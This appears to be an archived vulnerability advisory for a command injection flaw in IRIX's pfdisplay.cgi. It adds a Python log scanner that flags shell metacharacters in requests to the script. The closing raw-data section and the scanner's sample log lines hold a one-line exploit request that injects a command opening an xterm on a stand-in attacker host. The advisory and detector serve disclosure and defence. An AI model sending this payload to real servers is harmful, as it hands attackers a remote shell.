Vendor: IRIX
By: SecurityFocus
CVSS: 8.8 HIGH
Command Injection
CWE: 78
Product Name: IRIX
Affected Version From: IRIX 6.5.x
Affected Version To: IRIX 6.5.x
Patch Exists: YES
Related CWE: CVE-2000-0674
CPE: o:sgi:irix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2000

Security Vulnerability with CGI Program pfdisplay.cgi

The vulnerability exists in the pfdisplay.cgi program distributed with IRIX. It allows an attacker to inject arbitrary commands into the program, which are then executed with the privileges of the web server. This can be exploited by sending a specially crafted HTTP request to the vulnerable CGI program.

Mitigation:

Upgrade to the latest version of IRIX.
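
A log review complements the upgrade. The following is an added example, not part of the original advisory: it scans web server access logs for requests to the CGI whose query string decodes to control characters or shell metacharacters. The log lines are constructed samples, and the Common Log Format layout and the premise that the script's argument is a plain file path are assumptions.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Both spellings of the script name appear on this page, so match either.
SCRIPT_RE = re.compile(r"/pfdis(?:play|paly)\.cgi$", re.IGNORECASE)
# Assumption: the argument is a plain file path, so control bytes
# (including a decoded newline) and shell metacharacters are never expected.
SUSPICIOUS_RE = re.compile(r"[\x00-\x1f\x7f|;&`$<>]")

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] '
    '"GET /cgi-bin/pfdisplay.cgi?/doc/index.html HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Jan/2000:10:05:12 +0000] '
    '"GET /cgi-bin/pfdisplay.cgi?%0A/usr/bin/X11/xterm%20-display%20evil:0.0| HTTP/1.0" 200 0',
    '198.51.100.7 - - [01/Jan/2000:10:06:40 +0000] '
    '"GET /cgi-bin/pfdispaly.cgi?%250A/doc/index.html HTTP/1.0" 200 0',
    '192.0.2.10 - - [01/Jan/2000:10:07:00 +0000] '
    '"GET /index.html?a=1&b=2 HTTP/1.0" 200 1024',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%250A) is caught too."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(log_line):
    """Return None for unrelated requests, else (decoded_query, is_suspicious)."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    if not SCRIPT_RE.search(decode_fully(path)):
        return None
    decoded_query = decode_fully(query)
    return decoded_query, bool(SUSPICIOUS_RE.search(decoded_query))

def suspicious_requests(lines):
    """Collect the decoded query of every flagged request to the CGI."""
    results = (classify(line) for line in lines)
    return [r[0] for r in results if r is not None and r[1]]

if __name__ == "__main__":
    for query in suspicious_requests(SAMPLE_LOG):
        print(repr(query))
```
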
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem is not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'